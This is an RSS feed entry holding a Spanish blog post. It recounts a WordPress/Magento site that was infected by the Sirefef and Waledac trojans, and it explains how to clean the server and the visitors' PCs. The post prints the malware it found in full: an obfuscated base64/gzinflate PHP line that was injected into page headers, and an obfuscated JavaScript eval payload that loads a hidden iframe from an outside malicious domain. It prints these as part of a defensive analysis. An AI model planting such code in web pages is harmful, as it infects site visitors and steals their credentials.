<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title> &#187; Waledac</title>
	<atom:link href="http://edprox.com/tag/waledac/feed/" rel="self" type="application/rss+xml" />
	<link>https://edprox.com</link>
	<description></description>
	<lastBuildDate>Mon, 13 Aug 2018 18:39:02 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Troyanos sirefef y waledac &#8211; Como detectarlos y protegerse.</title>
		<link>https://edprox.com/blog/troyanos-sirefef-y-waledac-como-detectarlos-y-protegerse/</link>
		<comments>https://edprox.com/blog/troyanos-sirefef-y-waledac-como-detectarlos-y-protegerse/#comments</comments>
		<pubDate>Mon, 23 Apr 2012 20:05:56 +0000</pubDate>
		<dc:creator>Webmaster</dc:creator>
				<category><![CDATA[blog]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Proteccion]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sirefef]]></category>
		<category><![CDATA[Troyanos]]></category>
		<category><![CDATA[Virus]]></category>
		<category><![CDATA[Waledac]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">https://edprox.com/?p=473</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<p>Lamentablemente durante los últimos días han surgido un nuevo tipo de troyanos que están infectando masivamente servidores de todo el mundo. Esta es la historia de mi encuentro con <strong>Sirefef y Waledac</strong>.</p>
<h2>Un poco de historia</h2>
<p>Hace poco recibí una llamada de una persona que tenia una pagina web de ventas y me indicaba que estaba perdiendo muchos clientes porque al entrar a su pagina les aparecía el antivirus con un mensaje de infección y publicidad en la pagina de la que no tenia control. Esto producía que muchos clientes le llamaran para quejarse y perdiera ventas. Esta persona estaba desesperada porque no sabia que hacer y la persona encargada de la pagina (webmaster) tampoco sabia que hacer.</p>
<p>El servidor estaba basado en la plataforma LAMP(Linux, Apache, MySQL y PHP) con los frameworks WordPress y Magento para gestionar la pagina y la tienda. Aparentemente, todos los síntomas indicaban que <strong>el servidor a sufrido un ataque XSS</strong> debido a una vulnerabilidad en el código. Todas las paginas tenían en la cabecera el siguiente código PHP:<span id="more-473"></span></p>
<div class="box  box_ box_white box_shadow box_ box_corners box_full " style="  margin:left:0 !important; margin-right:0 !important;">
<div class="box_inner">
<h3>Código PHP</h3>
<p>#d93065#</p>
<p>echo(gzinflate(base64_decode(&#8220;tVVLc5swEP4t5WKoBxcJ9GCIemhOPffI+ODB4G<br />
zGMS5Qe5JM/ntXK9mxE+xmOpMBMSvt6tuHvkU3fdXBdvhemTRmBZiYT6sCmnC76Pr65<br />
2YIgySYBgwHx5EGkTFGp9HQPT7/aNt1vdiEURlsu3Zoh8dtHcxnv1+qxVDdhfWq3q/6ZfSMa<br />
HvYLNv9bNlWfx7qzRA1ppzEKQM7pADJIdaQgExAMRA5KAUyB8lA4YoEfFKaSeC4rK18qlc<br />
CuATNIMtAKGucahLIJoEYQbWFRgdohVNcYIA2KUo6hZgrOMTzGpPKXkFQTtCW5We2W<br />
tjAbTTaBoECTsfwLiamcguN/uyMYsUck5EAYvJgV3LglIPMKHd8OTDU4uM9oE6B5lZ2TjIS<br />
Sc1IJO9MAW22QNwiWh85+XbRZd5TjqVyalySrjyp9//WQlEqmvljcmqlKUVhv4JkqX3SaM<br />
kcLrm1L1UHK41B2XDFoTyCpom1x7II58vVXvn6sSM9OGWIp0FIkrby4wLGxLkttBopNWrw<br />
FEYP+2Qqua+kyM+ii/Vl+oxQQ1EyqLf7qA+4q/RFyghHGUb7KOvRpiDaj/CIucxwWXrO2lM<br />
UBy5l/oyOJSWcI/VQzj6HfGdRnVJI/oM+x254w6D4GuIFajmsS+y6hnhKO4eir0dwoOS48Q<br />
eP5bxbD4fju/E/AN/39xjmx39vn/fflkR/ThQiPLTBsDwNqH8Sm/xIG0/mZTKf9ds1DOEEJlG<br />
xM0G9w+ttgWMdFC94Y+2i2rhbq9zNi71pit6U86Izv4YONquiabuwEFJ8MVDA1LDo+R6l3v<br />
TTrgwaxOlwtA+3+L1bWPm2XeLtGO7L+/lXNs2SyLt5Mr29b5uoDp+i4uabv4//Ag==&#8221;)));</p>
<p>#/d93065#
</p></div>
</div>
<p>Este código luego mostraba lo siguiente al cliente:</p>
<div class="box  box_ box_white box_shadow box_ box_corners box_full " style="  margin:left:0 !important; margin-right:0 !important;">
<div class="box_inner">
<h3>Código HTML/JavaScript</h3>
<div>&lt;NOscript&gt;c=2;i=c-2;if(parseInt(&#8220;0123&#8243;)===83)if(window.document)try{new String<br />
(&#8220;asd&#8221;).prototype.q}catch(egewgsd){f=['-29i-29i67i64i-6i2i62i73i61i79i71i63i72i78<br />
i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1<br />
i3i53i10i55i3i85i-25i-29i-29i-29i67i64i76i59i71i63i76i2i3i21i-25i-29i-29i87i-6i63i<br />
70i77i63i-6i85i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i81i76i67i78i63i2i-4i22i6<br />
7i64i76i59i71i63i-6i77i76i61i23i1i66i78i78i74i20i9i9i64i69i73i78i64i70i76i8i13i62<br />
i7i65i59i71i63i8i61i73i71i9i62i9i14i10i14i8i74i66i74i25i65i73i23i11i1i-6i81i67i62i7<br />
8i66i23i1i11i10i1i-6i66i63i67i65i66i78i23i1i11i10i1i-6i77i78i83i70i63i23i1i80i67i7<br />
7i67i60i67i70i67i78i83i20i66i67i62i62i63i72i21i74i73i77i67i78i67i73i72i20i59i60<br />
i77i73i70i79i78i63i21i70i63i64i78i20i10i21i78i73i74i20i10i21i1i24i22i9i67i64i76i5<br />
9i71i63i24i-4i3i21i-25i-29i-29i87i-25i-29i-29i64i79i72i61i78i67i73i72i-6i67i64i76<br />
i59i71i63i76i2i3i85i-25i-29i-29i-29i80i59i76i-6i64i-6i23i-6i62i73i61i79i71i63i72i7<br />
8i8i61i76i63i59i78i63i31i70i63i71i63i72i78i2i1i67i64i76i59i71i63i1i3i21i64i8i77i6<br />
3i78i27i78i78i76i67i60i79i78i63i2i1i77i76i61i1i6i1i66i78i78i74i20i9i9i64i69i73i78<br />
i64i70i76i8i13i62i7i65i59i71i63i8i61i73i71i9i62i9i14i10i14i8i74i66i74i25i65i73i23<br />
i11i1i3i21i64i8i77i78i83i70i63i8i80i67i77i67i60i67i70i67i78i83i23i1i66i67i62i62i<br />
63i72i1i21i64i8i77i78i83i70i63i8i74i73i77i67i78i67i73i72i23i1i59i60i77i73i70i79i<br />
78i63i1i21i64i8i77i78i83i70i63i8i70i63i64i78i23i1i10i1i21i64i8i77i78i83i70i63i8<br />
i78i73i74i23i1i10i1i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i81i67i62i78i<br />
66i1i6i1i11i10i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i66i63i67i65i66i<br />
78i1i6i1i11i10i1i3i21i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i7<br />
1i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i8i59i74i74<br />
i63i72i62i29i66i67i70i62i2i64i3i21i-25i-29i-29i87'][0].split(&#8216;i&#8217;);md=&#8217;a';v=&#8221;eval&#8221;;}i<br />
f(v)e=window[v];w=f;s=[];r=String;for(;591!=i;i+=1){j=i;s+=r["fromCharCode"](3<br />
8+1*w[j]);}</div>
<div>if(f)z=s;e(z);&lt;/NOscript&gt;</div>
</div>
</div>
<p>Después de ver el log de acceso por FTP, la infección se había producido con el usuario principal del cual solo tenia acceso el webmaster de la pagina. Después de analizar el equipo que el estaba utilizando, entendí lo que había pasado.</p>
<p>Este código se aprovecha de una <strong>vulnerabilidad en Internet Explorer 9.0.8112.16421</strong>, que ha dia de hoy aun no esta solucionada para infectar con un virus a la persona que visita la pagina. Una vez infectado el sistema, <strong>modifica el archivo HOSTS</strong> de Windows para redirigir el trafico de varias redes de publicidad (ADsense entre otras) y lo peor de todo, <strong>busca las contraseñas de acceso al servidor mediante FTP almacenadas en Filezilla</strong>. Lamentablemente Filezilla almacena la contraseñas en modo texto. Una vez el virus tiene las contraseñas del servidor , las utiliza para poder acceder e inyectar el código malicioso en la cabecera de todas las paginas que encuentre. Con esto, el circulo se cierra y vuelve a empezar el proceso, infectando a mas personas.</p>
<p>&nbsp;</p>
<h2>Solución y desinfección del servidor:</h2>
<ol>
<li><strong>Cambia las contraseñas FTP</strong> del servidor desde un equipo que no este infectado. Si no tienes acceso a un equipo desinfectado entonces es mejor que no cambies las contraseñas y desinfectes el equipo primero.</li>
<li><strong>Carga una copia de seguridad que no este infectada</strong> y con esto ya estaría solucionado el problema con el servidor. Si no tienes un copia de seguridad, continua con el paso 3.</li>
<li>Si utilizas WordPress, debes ir a <strong>..\wp-content\themes\NOMBRE_DEL_TEMA\header.php</strong> y buscar la linea de código php que indique anteriormente, borra la linea de código y guarda el código.</li>
<li>Como método preventivo también utilizaría el plugin de WordPress llamado <a href="http://wordpress.org/extend/plugins/antivirus/" rel="nofollow" target="_blank">Antivirus</a> para escanear todo el código y asegurarte de que esta todo limpio.</li>
</ol>
<p>&nbsp;</p>
<h2>Solución y desinfección del cliente:</h2>
<ol>
<li>Esta infección es muy reciente, por lo que <strong>muchos antivirus no la detectan</strong>, por suerte Security Essentials si que la detecta. Desinfecta el equipo con <a href="http://windows.microsoft.com/en-US/windows/products/security-essentials" rel="nofollow" target="_blank">Microsoft Security Essentials</a>, Sirefef y Waledac se suelen encontrar en C:\Users\USUARIO\AppData\Local\Temp\. Sirefef suele tener un nombre aleatorio con la extensión .dll y Waledac un nombre aleatorio con la extensión .tmp. Después de desinfectar el sistema debes escanear todo el sistema para descartar otras infecciones.</li>
<li>El archivo HOSTS de Windows también estará infectado. Si lo intentas desinfectar manualmente te encontraras con que el archivo tiene unos permisos especiales (por culpa del virus) y no podrás editarlo. La solución mas fácil para desinfectarlo es utilizar la <a href="http://support.microsoft.com/kb/972034" rel="nofollow" target="_blank">siguiente herramienta de microsoft</a>.</li>
</ol>
<p>&nbsp;</p>
<p>Como conclusión, recomiendo<strong> no volver a usar Internet Explorer</strong>. Firefox y Chrome son alternativas mas seguras. Si tienes alguna duda, déjame un comentario.</p>
<p><a href="http://affiliates.mozilla.org/link/banner/14288" rel="nofollow" target="_blank"><img class="aligncenter" src="http://affiliates-cdn.mozilla.org/media/uploads/banners/d7d8b2e512058682c6fd208580ece71cb772e98e.png" alt="Descargar: Rápido, Divertido y Genial" /></a>
<div style='clear:both'></div>
]]></content:encoded>
			<wfw:commentRss>https://edprox.com/blog/troyanos-sirefef-y-waledac-como-detectarlos-y-protegerse/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>
<!-- WP Super Cache is installed but broken. The path to wp-cache-phase1.php in wp-content/advanced-cache.php must be fixed! -->